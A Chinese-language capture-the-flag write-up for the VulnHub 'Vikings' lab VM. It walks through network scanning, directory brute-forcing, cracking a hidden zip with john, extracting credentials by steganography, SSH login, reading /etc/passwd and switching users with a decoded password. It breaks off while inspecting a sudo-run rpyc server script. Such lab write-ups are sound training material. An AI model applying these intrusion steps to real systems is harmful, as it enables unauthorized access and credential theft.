靶机：Vikings

• 靶机地址: https://download.vulnhub.com/vikings/Vikings.ova

  • MD5 校验：84f72c38e2458e01d00db920a40d51ea

  • SHA1 检验：1c8ac7a6c7454c8c8081cd65af305c2a3ee803d4

    • cmd 进行校验: certutil -hashfile 文件路径 EncryptionType
    • powershell 进行校验: Get-FileHash 文件路径 -Algorithm EncryptionType | Format-List
    • EncryptionType 是加密类型：SHA1, MD5

  • 使用 VirtualBox

  • 网络 Host-Only

• 配置网络环境：https://www.cnblogs.com/shadow-/p/16815020.html

  • kali: NAT + [ Bridged/Host-Only ]

发现目标

使用常规工具：

• arp-scan
• nmap
• netdiscover
• fping

初步扫描 sudo arp-scan -l -I eth1

┌──(kali㉿kali)-[~]
└─$ sudo arp-scan -l -I eth1
[sudo] kali 的密码：
Interface: eth1, type: EN10MB, MAC: 08:00:27:5f:50:d7, IPv4: 192.168.56.116
Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:0d       (Unknown: locally administered)
192.168.56.100  08:00:27:fe:df:e0       PCS Systemtechnik GmbH
192.168.56.120  08:00:27:c3:38:3d       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.8: 256 hosts scanned in 2.177 seconds (117.59 hosts/sec). 3 responded

• 发现目标 192.168.56.120
• 192.168.56.1 是 virtualbox 在 Host-Only 的网关地址
• 192.168.56.100 是 virtualbox 在 Host-Only 的 DHCP 服务器地址

使用 nmap 对发现 IP 进行端口扫描 nmap -A -T4 192.168.56.120

┌──(kali㉿kali)-[~]
└─$ nmap -A -T4 192.168.56.120
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-01 11:08 CST
Nmap scan report for 192.168.56.120
Host is up (0.0016s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 59d4c0fd6245978315c015b2ac256099 (RSA)
|   256 7e37f011638015a3d39d43c609befbda (ECDSA)
|_  256 52e94f71bc14dc0034f2a7b358b50dce (ED25519)
80/tcp open  http    Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2020-10-29 21:07  site/
|_
|_http-title: Index of /
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.84 seconds

• 目标开发两个端口 22, 80
• 22/tcp 是经典的 SSH 版本是 OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
• 80/tcp 是经典的 http 服务使用 Apache httpd 2.4.29
• 其中 http-title: Index of / 的 Index of / 页面网站下的所有文件和文件夹中，不必在通过HTTP的网页形式了，从而避免了那些网站的限制

信息收集

信息收集一般从易到难，我们先从 http://192.168.56.120:80/ 突入，使用 firefox 或 curl 简单查看一下页面

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /</title>
 </head>
 <body>
<h1>Index of /</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=A">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=D">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="site/">site/</a></td><td align="right">2020-10-29 21:07  </td><td align="right">  - </td><td>&nbsp;</td></tr>
   <tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.120 Port 80</address>
</body></html>

• 一个文件目录，其中有名为 site 的目录，大概意思应该是站点

• 我们使用 firefox 访问 http://192.168.56.120/site/ 发现长时间无法访问，建议通过 curl http://192.168.56.120/site/ 进行访问

  
  
  
  
  
  
  
  
  
  

  
  
  

  
  
  

  Ivar The Boneless

  Mad King

  865 the Great Heathen Army, led by Ivar, invaded the Anglo-Saxon Heptarchy.The Heptarchy was the collective name for the seven kingdoms East Anglia, Essex, Kent, Mercia, Northumbria, Sussex and Wessex. The invasion was organised by the sons of Ragnar Lodbrok, to wreak revenge against Ælla of Northumbria who had supposedly executed Ragnar in 865 by throwing him in a snake pit, but the historicity of this explanation is unknown.According to the saga, Ivar did not overcome Ælla and sought reconciliation. He asked for only as much land as he could cover with an ox's hide and swore never to wage war against Ælla. Then Ivar cut the ox's hide into such fine strands that he could envelop a large fortress (in an older saga it was York and according to a younger saga it was London), which he could take as his own. (Compare the similar legendary ploy of Dido.)

  Connect

  • Blog
  • Email
  • Newsletter

  social

  • Twitter
  • Instagram
  • Dribbble

  network

  • Link One
  • Link Two
  • Link Three

  2020 Ivar The Boneless

  
  

• 从页面中的我们大概知道访问慢的原因是网页使用了一些外网链接比如 https://ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js 这样的外网内容，导致在国内无法加载

• 注释中的特殊内容是用于浏览器 IE 兼容问题

• 网页中大部分 <a> 链接都是假的，href="#" 是指当前页面

• 网页中文章内容解读应该从 <title>Split</title> 、<div class="name">Ivar The Boneless</div> 、以及 <p class="bio"> 中的文本，大概意思是分裂的主题，一般我们需要提取其中的 人名 或 地名 做为我们后续密码破解的字典，因为部分人会根据自己的喜好用故事中的人名地名做密码或账号的内容

  无骨伊瓦尔
  
  865年，由伊瓦尔率领的大希思军团入侵盎格鲁撒克逊人的赫帕奇。赫普塔克王朝是东安格利亚、埃塞克斯、肯特、麦西亚、诺森布里亚、苏塞克斯和威塞克斯七个王国的统称。这次入侵是由拉格纳·洛德布罗克（Ragnar Lodbrok）的儿子组织的，目的是为了报复诺森布里亚的Ælla，据称他于865年将拉格纳扔进蛇坑处决，但这一解释的历史性不得而知。根据传说，伊瓦尔没有克服Ælla并寻求和解。他只要求用牛皮覆盖尽可能多的土地，并发誓永远不会对Ælla发动战争。然后伊瓦尔把牛皮剪成细绳，他可以包围一座大城堡（在一个古老的传说中是约克，根据一个年轻的传说是伦敦），他可以把它当作自己的城堡。（比较迪多的类似传奇策略。）

目前我们已经没有线索了，这种时候就应该对其 Web 路径进行爆破，查看是否存在隐藏路径，推荐工具

• dirsearch

• dirb

• dirbuster

• gobuster

• feroxbuster

  ┌──(kali㉿kali)-[~]
  └─$ dirsearch -u http://192.168.56.120

  |. _ _ _ _ | v0.4.2
  (||| ) (/(|| (_| )

  Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

  Output File: /home/kali/.dirsearch/reports/192.168.56.120/_22-12-01_11-42-58.txt

  Error Log: /home/kali/.dirsearch/logs/errors-22-12-01_11-42-58.log

  Target: http://192.168.56.120/

  [11:42:58] Starting:
  [11:43:02] 403 - 279B - /.ht_wsr.txt
  [11:43:02] 403 - 279B - /.htaccess.save
  [11:43:02] 403 - 279B - /.htaccess_orig
  [11:43:02] 403 - 279B - /.htaccess.sample
  [11:43:02] 403 - 279B - /.htaccess.bak1
  [11:43:02] 403 - 279B - /.htaccess_extra
  [11:43:02] 403 - 279B - /.htaccess.orig
  [11:43:02] 403 - 279B - /.htaccessBAK
  [11:43:02] 403 - 279B - /.htaccessOLD
  [11:43:02] 403 - 279B - /.htaccess_sc
  [11:43:02] 403 - 279B - /.httr-oauth
  [11:43:02] 403 - 279B - /.htpasswds
  [11:43:02] 403 - 279B - /.htpasswd_test
  [11:43:02] 403 - 279B - /.htm
  [11:43:02] 403 - 279B - /.html
  [11:43:02] 403 - 279B - /.htaccessOLD2
  [11:45:17] 403 - 279B - /server-status
  [11:45:17] 403 - 279B - /server-status/
  [11:45:21] 301 - 315B - /site -> http://192.168.56.120/site/
  [11:45:22] 200 - 4KB - /site/

  Task Completed

目前只有 http://192.168.56.120/site/ 所以继续爆破

┌──(kali㉿kali)-[~]
└─$ dirsearch -u http://192.168.56.120/site/

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )                                                                                                            

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /home/kali/.dirsearch/reports/192.168.56.120/-site-_22-12-01_11-47-48.txt

Error Log: /home/kali/.dirsearch/logs/errors-22-12-01_11-47-48.log

Target: http://192.168.56.120/site/

[11:47:48] Starting:
[11:47:49] 301 -  318B  - /site/js  ->  http://192.168.56.120/site/js/
[11:47:52] 403 -  279B  - /site/.ht_wsr.txt
[11:47:52] 403 -  279B  - /site/.htaccess.sample
[11:47:52] 403 -  279B  - /site/.htaccess.orig
[11:47:52] 403 -  279B  - /site/.htaccess.save
[11:47:52] 403 -  279B  - /site/.htaccess_extra
[11:47:52] 403 -  279B  - /site/.htaccess_orig
[11:47:52] 403 -  279B  - /site/.htaccess_sc
[11:47:52] 403 -  279B  - /site/.htaccessBAK
[11:47:52] 403 -  279B  - /site/.htaccessOLD
[11:47:52] 403 -  279B  - /site/.htaccessOLD2
[11:47:52] 403 -  279B  - /site/.htm
[11:47:52] 403 -  279B  - /site/.html
[11:47:52] 403 -  279B  - /site/.htaccess.bak1
[11:47:52] 403 -  279B  - /site/.htpasswd_test
[11:47:52] 403 -  279B  - /site/.htpasswds
[11:47:52] 403 -  279B  - /site/.httr-oauth
[11:48:42] 301 -  319B  - /site/css  ->  http://192.168.56.120/site/css/
[11:49:00] 200 -    1KB - /site/images/
[11:49:00] 301 -  322B  - /site/images  ->  http://192.168.56.120/site/images/
[11:49:03] 200 -    4KB - /site/index.html
[11:49:05] 200 -  951B  - /site/js/

• 没有什么新鲜内容，我们需要所以之前收集的信息制作一个字典用于爆破，使用 python 制作字典生成脚本 create_dict.py

  import re

  text = r"865 the Great Heathen Army, led by Ivar, invaded the Anglo-Saxon Heptarchy.The Heptarchy was the collective name for the seven kingdoms East Anglia, Essex, Kent, Mercia, Northumbria, Sussex and Wessex. The invasion was organised by the sons of Ragnar Lodbrok, to wreak revenge against Ælla of Northumbria who had supposedly executed Ragnar in 865 by throwing him in a snake pit, but the historicity of this explanation is unknown.According to the saga, Ivar did not overcome Ælla and sought reconciliation. He asked for only as much land as he could cover with an ox's hide and swore never to wage war against Ælla. Then Ivar cut the ox's hide into such fine strands that he could envelop a large fortress (in an older saga it was York and according to a younger saga it was London), which he could take as his own. (Compare the similar legendary ploy of Dido.)"
  text_dict = text.split(' ')

  格式化去重

  res = []
  [res.append(re.sub(r'[\W]', '', i) + r'.%EXT%' + '\n') for i in text_dict if i not in res]

  生成字典文件

  with open('text_dict.txt', 'w', encoding='utf-8') as f:
  f.writelines(res)

• 生成的字典会在当前目录名称 text_dict.txt

• dirsearch -u 网址 -w 自定义目录地址

  ┌──(kali㉿kali)-[~/workspace]
  └─$ dirsearch -u http://192.168.56.120/site/ -w ~/workspace/text_dict.txt -e php,html,js,txt

  |. _ _ _ _ | v0.4.2
  (||| ) (/(|| (_| )

  Extensions: php, html, js, txt | HTTP method: GET | Threads: 30 | Wordlist size: 412

  Output File: /home/kali/.dirsearch/reports/192.168.56.120/-site-_22-12-01_12-38-55.txt

  Error Log: /home/kali/.dirsearch/logs/errors-22-12-01_12-38-55.log

  Target: http://192.168.56.120/site/

  [12:38:56] Starting:
  [12:38:59] 200 - 13B - /site/war.txt

  Task Completed

• 发现一文件 /site/war.txt

使用 curl http://192.168.56.120/site/war.txt

┌──(kali㉿kali)-[~/workspace]
└─$ curl http://192.168.56.120/site/war.txt
/war-is-over

在火狐上查看 curl http://192.168.56.120/site/war-is-over 是大量 base64 编码，我们可以使用 wget http://192.168.56.120/site/war-is-over 下载到本地查看

┌──(kali㉿kali)-[~/workspace]
└─$ wget http://192.168.56.120/site/war-is-over
--2022-12-01 12:49:57--  http://192.168.56.120/site/war-is-over
正在连接 192.168.56.120:80... 已连接。
已发出 HTTP 请求，正在等待回应... 301 Moved Permanently
位置：http://192.168.56.120/site/war-is-over/ [跟随至新的 URL]
--2022-12-01 12:49:57--  http://192.168.56.120/site/war-is-over/
再次使用存在的到 192.168.56.120:80 的连接。
已发出 HTTP 请求，正在等待回应... 200 OK
长度：1881260 (1.8M) [text/html]
正在保存至: “war-is-over”

war-is-over                      100%[=========================================================>]   1.79M  --.-KB/s  用时 0.04s   

2022-12-01 12:49:57 (50.0 MB/s) - 已保存 “war-is-over” [1881260/1881260])

┌──(kali㉿kali)-[~/workspace]
└─$ ls
a.php  create_dict.py  proxychains.conf  text_dict.txt  war-is-over  x.txt

┌──(kali㉿kali)-[~/workspace]
└─$ cat war-is-over
UEsDBDMDAQBjAAKAI1MAAAAA3IYVAALRFQAEAAsAa2luZwGZBwACAEFFAQgAV3rWTJK9PAXMoWx/fo3tm3aPB1giBaLhkGT8nQpRDt1eI0cOwDhahacPQYGBBGk/wLB8p6AtIrr+sGlWKfinjvrKMgkOOAqem2D8GNfzr1IxU0q876/02NC9VxpiYK9IKw425FqBcBJFcNXZ7PCVGwVVJyHKplUukjl31Em2ICx7r5toNOSVXJP8XOeUY8c7xPY72B1dbQ2PdEp3PwCggZ0UWRonMorjNCAT3D8Tj/x5zrlnvDuC4yIhhFDxiWLjIVR0dDJuZhd/JM+KVR4I9YrEmqupHLKJcfqf/BlvgMU/iXo7sMd1y/ck6wM11sgYq8EF557aeSPXjD2hI8iztksZZS9sx3lEHqPRlRn2zMDFOI+5A8iTO+nAJ7HkFt4NfyJjWNCuFzCnv/TVOBQfNfPgKyYdjUW/CHarhPlctpeV+IiqsoHW1M6S2aHLM9wk8zOlh+7m6le6ifo23usST80Wt48EYs5y+uz4621cr1nY8lc2jf95prNYrtMIuJaargXZy84fwVyZKWXBuanEWBE/soy0l4KL/wy2KhF2438RQwf7zbgwvRhGeGsnsNdDRkMb9L9+bA42w6XlhK2sonSTwkYlK1OEp0fxuoSRsEdOT9gX8/2E8C95LTdz2j637XHJy+gIXjx2mZWTfYTbaJl5YnO3DSOuI9gMBzIAqfuJo8zQPu9ouHY59q5Nojtaq4QZLpnCbCexyogk5PDMCQxhMZztzNR7nVo3KWRxBsYa41fqeAaSk1KnQRDsRR7fVzuanL/J67NjX2ULXhKgxGhv8Csk6U9dfUj3djfVlw7uRi/FkiQ8hRBEoUG3JF4IRV49mYBY87+eRQLScAVDFfx0HrCY/M/zpVvl8hVvO4dqWGz2qEl+90C8sJ
... ... ...

我们使用 base64 war-is-over -d | more 解密并查看内容，发现是大量的乱码但开头的 PK3c 一般表明可能是二进制文件

┌──(kali㉿kali)-[~/workspace]
└─$ base64 war-is-over -d | more
PK3c�#S܆�
         king�AWz�L��<l~���v�X"���d��
Q�^#G�8Z��A��i?��|��-"���iV)�����2      8
��`�▒���R1SJ�����нW▒b`�H+6�Z�pEp�����'!ʦU.�9w�I� ,{��h4��\��\��c�;��;�]m

▒"o��
     |V�H3a��~���U�2L���r��
A�)SA�捓޶qV��^��'�6�z$e����aۉh�¥�5�+����d�h�r�6%���w�(��=����Re5���▒�Xպi��f
����&I����������鋯�7z1�,l���Q0�P�"�f+"���JǙfg}y�
�^�V�y��<��T!�▒5���▒s�#�D��r�Q%��s������<0^;Հ��R=@`� ��-X�W���:7J6]��<��Y�Q���O���(ʃ�d<#���

• 当然以上我们不确定，我们可以使用 https://gchq.github.io/CyberChef/ 的 Detect File Type 进一步探测，最终知道是 zip 类型文件
• 使用 base64 war-is-over -d > a.zip 获取为压缩包，在解压是会发现需要密码

John 密码破解 ZIP

• 先生成 john 可以理解的数据 zip2john a.zip > data

• 使用自带的字典 /usr/share/wordlists/rockyou.txt 如果没有可能是没有解压字典

• 破译 john data --wordlist=/usr/share/wordlists/rockyou.txt

  ┌──(kali㉿kali)-[~/workspace]
  └─$ john data --wordlist=/usr/share/wordlists/rockyou.txt
  Using default input encoding: UTF-8
  Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 128/128 SSE2 4x])
  Cost 1 (HMAC size) is 1410760 for all loaded hashes
  Press 'q' or Ctrl-C to abort, almost any other key for status
  ragnarok123 (a.zip/king)
  1g 0:00:01:11 DONE (2022-12-01 13:15) 0.01403g/s 4143p/s 4143c/s 4143C/s raihanah..raejean
  Use the "--show" option to display all of the cracked passwords reliably
  Session completed.

• 密码为 ragnarok123

• 解压后是一张图片 king

• 密码的 ragnarok 也是前文中的一个人名

隐写术

一般这种刻意隐藏，已经和图片或 pdf 都会涉及隐写术，我们使用相关工具进行检验

┌──(kali㉿kali)-[~/workspace]
└─$ steghide info king
"king":
  format: jpeg
  capacity: 76.2 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:

• 其中雀实存在隐写，但存在密码

  ┌──(kali㉿kali)-[~/workspace]
  └─$ foremost king 127 ⨯
  Processing: king
  |foundat=user��wK��/-v�O,I*��II-�O����t(����K/V p���9�▒�'��1W�
  *|

• 使用 foremost 提取数据会在当前目录下生成 output 的目录

  ┌──(kali㉿kali)-[~/workspace]
  └─$ tree output
  output
  ├── audit.txt
  ├── jpg
  │   └── 00000000.jpg
  └── zip
  └── 00002792.zip

  2 directories, 3 files

• audit.txt 是日志不用管

• 00000000.jpg 是原本那张图片

• 00002792.zip 就是我们需要的隐藏数据

  ┌──(kali㉿kali)-[~/workspace]
  └─$ unzip output/zip/00002792.zip
  Archive: output/zip/00002792.zip
  inflating: user

• 00002792.zip 解压得到的只有 user 文件

• 下面是 user 文件内容

  //FamousBoatbuilder_floki@vikings
  //f@m0usboatbuilde7

明显这种格式已经文件名称 user 我们下一步应该是 SSH 登录尝试

SSH 登录

首先我们分析一下已有信息，一般这种有寓意类的在故事中都存在暗示

• 来自网页的 http://192.168.56.120:80/ 信息

  <title>Split</title>
  
  Ivar The Boneless
  
  <h1>Mad King</h1>
  
  865 the Great Heathen Army, led by Ivar, invaded the Anglo-Saxon Heptarchy.The Heptarchy was the collective name for the seven kingdoms East Anglia, Essex, Kent, Mercia, Northumbria, Sussex and Wessex. The invasion was organised by the sons of Ragnar Lodbrok, to wreak revenge against Ælla of Northumbria who had supposedly executed Ragnar in 865 by throwing him in a snake pit, but the historicity of this explanation is unknown.According to the saga, Ivar did not overcome Ælla and sought reconciliation. He asked for only as much land as he could cover with an ox's hide and swore never to wage war against Ælla. Then Ivar cut the ox's hide into such fine strands that he could envelop a large fortress (in an older saga it was York and according to a younger saga it was London), which he could take as his own. (Compare the similar legendary ploy of Dido.)

• user 文件

  //FamousBoatbuilder_floki@vikings
  //f@m0usboatbuilde7

其中的关键人物 Ragnar Lodbrok 感兴趣可以查看关于他的故事，他是北欧传说中的半传奇英雄一位传奇海盗领袖，他最终在 865 年因为遭遇海难，漂流至英格兰的诺森布里亚国王Aella的领地，被俘后遭处死，上面故事其 “无骨者” 伊瓦尔 和 “白衣” 哈夫丹 为父亲 Ragnar Lodbrok 复仇，在标题中是分裂

• 我们找到的隐藏文件 war 是战争，在 war-is-over 是战争结束，我们破译时使用的密码是 ragnarok123 明显是指 Ragnar Lodbrok 得到的文件也是 king 这张图片，Ragnar Lodbrok 是他们的王或称首领，图片中是维京人的船，FamousBoatbuilder 是船制造者，后面接的 vikings 是指维京人的意思，那么 floki 就应该是人名，是 king 这张图片中船的制造者，其实也可以百度 floki 和维京人可以发现这就是一个经典的维京人名称，故事中 Ragnar 和他的筑船师朋友 Floki 共同建造了能够征服北大西洋的新型「无畏舰」

  其中 floki 也有英勇的含义，在维京人的传说中勇敢无畏的战士在死后会通过船只引渡到英灵殿中，这是维京人的之高荣誉，并且在故事中 865 年是 Ragnar Lodbrok 死去的时间节点

• 在 SSH 是我们都是 name@host 以此推断 floki@192.168.56.120

• 密码应该是 f@m0usboatbuilde7

其实此处应该使用以上信息生成账号字典与密码字典进行爆破是最为有效的策略

┌──(kali㉿kali)-[~]
└─$ ssh floki@192.168.56.120
The authenticity of host '192.168.56.120 (192.168.56.120)' can't be established.
ED25519 key fingerprint is SHA256:volom5GRMcetvgfJsyVTXVnNY0FUA6W1k/5fsdHs9T4.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.120' (ED25519) to the list of known hosts.
floki@192.168.56.120's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-154-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Dec  2 01:49:58 UTC 2022

  System load:  0.23              Processes:             98
  Usage of /:   52.0% of 8.79GB   Users logged in:       0
  Memory usage: 18%               IP address for enp0s3: 192.168.56.120
  Swap usage:   0%

0 updates can be applied immediately.

You have mail.
Last login: Sat Sep  4 04:38:04 2021 from 10.42.0.1
floki@vikings:~$ id
uid=1000(floki) gid=1000(floki) groups=1000(floki),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd)

尝试提权

先查看一下当前目录的信息

floki@vikings:~$ ls
boat  readme.txt
floki@vikings:~$ cat boat
#Printable chars are your ally.
#num = 29th prime-number.
collatz-conjecture(num)
floki@vikings:~$ cat readme.txt
_______________________________________________________________________Floki-Creation____________________________________________________________________________________________________

I am the famous boat builder Floki. We raided Paris this with our all might yet we failed. We don't know where Ragnar is after the war. He is in so grief right now. I want to apologise to him.
Because it was I who was leading all the Vikings. I need to find him. He can be anywhere.
I need to create this `boat` to find Ragnar

• boat 是船的意思
• readme.txt 是 Floki 的故事

查看一番 /etc/passwd

floki@vikings:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
floki:x:1000:1000:floki:/home/floki:/bin/bash
ragnar:x:1001:1001::/home/ragnar:/bin/sh

• floki 之外还存在 ragnar 其中 Ragnar 是他们的王，或许 ragnar 应该有 root 权限
• readme.txt 中 Floki 说想要找到 Ranger 我们需要船
• boat 是船

所以我们需要解谜

#Printable chars are your ally.
#num = 29th prime-number.
collatz-conjecture(num)

• num 是第 29 个素数
• collatz-conjecture 数学的考拉兹猜想
• 需要是可打印的字符

编写代码，记着可以使用分屏 ctrl+shift+D

import math

prime = []
for i in range(2, 10000):
    if i == 2:
        prime.append(i)
    else:
        for j in range(2, int(math.sqrt(i)) + 1):
            if i % j == 0:
                break
        else:
            prime.append(i)

num = prime[28]

c = []

while num != 1:
    if 0x20 <= num and num <= 0x7E:
        print(chr(num), end='')
    if num % 2 == 1:
        num = 3 * num + 1
    else:
        num //= 2

执行结果

┌──(kali㉿kali)-[~/workspace]
└─$ python3 collatz-conjecture.py
mR)|>^/Gky[gz=\.F#j5P(

• 密码为 mR)|>^/Gky[gz=\.F#j5P(

在登录的 ssh 上使用 su ragnar 进行登录

floki@vikings:~$ su ragnar
Password:
$ mR)|>^/Gky[gz=\.F#j5P(
sh: 1: Syntax error: ")" unexpected
$ id
uid=1001(ragnar) gid=1001(ragnar) groups=1001(ragnar)

• 登录后似乎还需要什么，但密码并不是 mR)|>^/Gky[gz=\.F#j5P( 而且 ragnar 并没有 root 权限

我们需要探查一下 ragnar

$ ls -lah
total 48K
drwxr-xr-x 5 floki floki 4.0K Sep  4  2021 .
drwxr-xr-x 4 root  root  4.0K Sep  3  2021 ..
lrwxrwxrwx 1 root  root     9 Sep  3  2021 .bash_history -> /dev/null
-rw-r--r-- 1 floki floki  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 floki floki 3.7K Apr  4  2018 .bashrc
-rw-r--r-- 1 floki floki   82 Oct 11  2020 boat
drwx------ 2 floki floki 4.0K Sep  3  2021 .cache
drwx------ 3 floki floki 4.0K Sep  3  2021 .gnupg
drwxrwxr-x 3 floki floki 4.0K Sep  3  2021 .local
-rw-r--r-- 1 floki floki  806 Sep  4  2021 .profile
-rw-r--r-- 1 floki floki  516 Oct 11  2020 readme.txt
-rw-rw-r-- 1 floki floki   66 Sep  3  2021 .selected_editor
-rw-r--r-- 1 floki floki    0 Sep  3  2021 .sudo_as_admin_successful
-rw------- 1 floki floki  897 Sep  4  2021 .viminfo
$ ls
boat  readme.txt
$ cat boat
#Printable chars are your ally.
#num = 29th prime-number.
collatz-conjecture(num)
$ cat readme.txt
_______________________________________________________________________Floki-Creation____________________________________________________________________________________________________

I am the famous boat builder Floki. We raided Paris this with our all might yet we failed. We don't know where Ragnar is after the war. He is in so grief right now. I want to apologise to him.
Because it was I who was leading all the Vikings. I need to find him. He can be anywhere.
I need to create this `boat` to find Ragnar
$

• 和上一个 Floki 很像，但并没有什么有价值的信息
• 在开始时有一个输入的过程，说明它自启动了某种脚本，而且在 floki 上是 bash 但 ragnar 却使用的 sh 这明显不合理，在 linux 中 bash 存在一种自登录的机制，那么我们开始时的那个脚本是不是于此有关

综上我们应该查看 .bashrc 、 .profile 文件一般会有 bash 自启动的程序

$ cat .profile
# ~/.profile: executed by the command interpreter for login shells.
# This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login
# exists.
# see /usr/share/doc/bash/examples/startup-files for examples.
# the files are located in the bash-doc package.

# the default umask is set in /etc/profile; for setting the umask
# for ssh logins, install and configure the libpam-umask package.
#umask 022
sudo python3 /usr/local/bin/rpyc_classic.py
# if running bash
if [ -n "$BASH_VERSION" ]; then
    # include .bashrc if it exists
    if [ -f "$HOME/.bashrc" ]; then
        . "$HOME/.bashrc"
    fi
fi

# set PATH so it includes user's private bin if it exists
if [ -d "$HOME/bin" ] ; then
    PATH="$HOME/bin:$PATH"
fi

# set PATH so it includes user's private bin if it exists
if [ -d "$HOME/.local/bin" ] ; then
    PATH="$HOME/.local/bin:$PATH"
fi
$

• 在 .profile 是 sudo python3 /usr/local/bin/rpyc_classic.py

查看该脚本

#!/usr/bin/python3
"""
classic rpyc server (threaded, forking or std) running a SlaveService
usage:
    rpyc_classic.py                         # default settings
    rpyc_classic.py -m forking -p 12345     # custom settings

    # ssl-authenticated server (keyfile and certfile are required)
    rpyc_classic.py --ssl-keyfile keyfile.pem --ssl-certfile certfile.pem --ssl-cafile cafile.pem
"""
import sys
import os
import rpyc
from plumbum import cli
from rpyc.utils.server import ThreadedServer, ForkingServer, OneShotServer
from rpyc.utils.classic import DEFAULT_SERVER_PORT, DEFAULT_SERVER_SSL_PORT
from rpyc.utils.registry import REGISTRY_PORT
from rpyc.utils.registry import UDPRegistryClient, TCPRegistryClient
from rpyc.utils.authenticators import SSLAuthenticator
from rpyc.lib import setup_logger
from rpyc.core import SlaveService

class ClassicServer(cli.Application):
    mode = cli.SwitchAttr(["-m", "--mode"], cli.Set("threaded", "forking", "stdio", "oneshot"),
                          default="threaded", help="The serving mode (threaded, forking, or 'stdio' for "
                          "inetd, etc.)")

    port = cli.SwitchAttr(["-p", "--port"], cli.Range(0, 65535), default=None,
                          help="The TCP listener port (default = %s, default for SSL = %s)" %
                          (DEFAULT_SERVER_PORT, DEFAULT_SERVER_SSL_PORT), group="Socket Options")
    host = cli.SwitchAttr(["--host"], str, default="", help="The host to bind to. "
                          "The default is localhost", group="Socket Options")
    ipv6 = cli.Flag(["--ipv6"], help="Enable IPv6", group="Socket Options")

    logfile = cli.SwitchAttr("--logfile", str, default=None, help="Specify the log file to use; "
                             "the default is stderr", group="Logging")
    quiet = cli.Flag(["-q", "--quiet"], help="Quiet mode (only errors will be logged)",
                     group="Logging")

    ssl_keyfile = cli.SwitchAttr("--ssl-keyfile", cli.ExistingFile,
                                 help="The keyfile to use for SSL. Required for SSL", group="SSL",
                                 requires=["--ssl-certfile"])
    ssl_certfile = cli.SwitchAttr("--ssl-certfile", cli.ExistingFile,
                                  help="The certificate file to use for SSL. Required for SSL", group="SSL",
                                  requires=["--ssl-keyfile"])
    ssl_cafile = cli.SwitchAttr("--ssl-cafile", cli.ExistingFile,
                                help="The certificate authority chain file to use for SSL. "
                                "Optional; enables client-side authentication",
                                group="SSL", requires=["--ssl-keyfile"])

    auto_register = cli.Flag("--register", help="Asks the server to attempt registering with "
